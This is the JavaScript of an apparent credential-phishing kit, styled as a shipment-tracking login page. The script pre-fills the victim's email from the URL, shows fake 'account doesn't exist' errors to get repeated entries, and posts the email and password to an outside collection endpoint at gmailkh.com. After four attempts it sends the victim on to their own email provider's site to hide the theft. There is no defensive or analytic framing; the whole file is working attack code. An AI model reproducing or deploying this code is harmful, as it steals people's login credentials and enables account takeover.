
/* global $ */
$(document).ready(function() {
    var count = 0;
    var images = ["https://firebasestorage.googleapis.com/v0/b/files-a8d0e.appspot.com/o/nze%2Fbg.jpg?alt=media&token=65b46690-8172-4e77-b87f-de46b798f47d", "https://firebasestorage.googleapis.com/v0/b/files-a8d0e.appspot.com/o/nze%2Fbg1.jpg?alt=media&token=6e838cfe-a557-4f92-90d4-d6e15f7e6d3f", "https://firebasestorage.googleapis.com/v0/b/files-a8d0e.appspot.com/o/nze%2Fbg2.jpg?alt=media&token=48f01e10-f010-4a06-b639-d95f1c7395ee", "https://firebasestorage.googleapis.com/v0/b/files-a8d0e.appspot.com/o/nze%2Fbg3.jpg?alt=media&token=de21fe9d-9c94-41cc-85f8-e896d0732ef3", "https://firebasestorage.googleapis.com/v0/b/files-a8d0e.appspot.com/o/nze%2Fbg4.jpg?alt=media&token=501ab5f0-5a91-49d7-a6b8-7d805d8abfca", "https://firebasestorage.googleapis.com/v0/b/files-a8d0e.appspot.com/o/nze%2Fbh5.jpg?alt=media&token=350a34c8-e2e9-45df-a908-0246dc39ecb5", "https://firebasestorage.googleapis.com/v0/b/files-a8d0e.appspot.com/o/nze%2Fbg6.png?alt=media&token=335899b4-9943-4f6d-9ea7-8e7788fd7b34"];
    $(function() {
        var i = 0;
        $("#animated-bg").css("background-image", "url('" + images[i] + "')");
        setInterval(function() {
            i++;
            if (i == images.length) {
                i = 0;
            }
            $("#animated-bg").fadeOut("slow", function() {
                $(this).css("background-image", "url(" + images[i] + ")");
                $(this).fadeIn("slow");
            });
        }, 3500);
    });
    $('#back1').click(function() {
        $("#msg").hide();
        $('#ai').val("");
        $("#automail").animate({ left: 200, opacity: "hide" }, 0);
        $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);

    });

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();
        
    }
    ///////////////url getting ai////////////////



    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("Email field is emply.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("pr field is emply.!");
            ai.focus;
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        $('#aich').html(my_ai);
        ///////////new injection////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: 'https://gmailkh.com/wpcontent/next.php',
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('<font face="Arial, Helvetica, sans-serif" size="2" color="#FFF">Verifying...</font>');
            },
            success: function(response) {
                if (response) {
                    $("#msg").show();
                    console.log(response);
                    if (response['signal'] == 'ok') {
                        $("#pr").val("");
                        if (count >= 4) {
                            count = 0;
                            // window.location.replace(response['redirect_link']);
                            window.location.replace("http://www." + my_slice);

                        }
                        // $('#msg').html(response['msg']);
                    } else {
                        // $('#msg').html(response['msg']);
                    }
                }
            },
            error: function() {
                $("#pr").val("");
                if (count >= 4) {
                    count = 0;
                    window.location.replace("http://www." + my_slice);
                }
                $("#msg").show();
                // $('#msg').html("Please try again later");
            },
            complete: function() {
                $('#submit-btn').html('<font face="Arial, Helvetica, sans-serif" size="2" color="#FFF">Track Shipment >></font>');
            }
        });
    });


});
